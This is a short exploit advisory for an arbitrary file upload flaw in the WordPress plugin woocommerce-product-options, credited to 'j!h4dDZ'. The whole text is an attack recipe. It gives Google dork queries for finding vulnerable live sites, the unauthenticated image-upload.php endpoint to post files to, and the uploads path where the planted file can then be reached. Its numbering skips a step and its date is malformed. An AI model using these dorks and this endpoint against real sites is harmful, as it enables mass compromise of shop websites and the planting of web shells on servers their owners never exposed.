============================================================================
# Exploit Title: WordPress Plugins woocommerce-product-options - Arbitrary File Upload
# Date: 24/08/017
# Exploit Author: j!h4dDZ
# Tested on: Windows 7
============================================================================
1)---------- Search target with Google Dorking-----------------------------
inurl:wp-content/plugins/woocommerce-product-options
Index of wp-content/plugins/woocommerce-product-options
---------------------------------------------------------------------------
2)--------------------Exploit the websites---------------------------------
-----------------------File Upload-----------------------------------------
(PoC)
https://localhost/wp-content/plugins/woocommerce-product-options/includes/image-upload.php
------------------------------------------------------------------------------
4) --------------------------Location File:----------------------------------
http://localhost/wp-content/uploads/FILE.jpg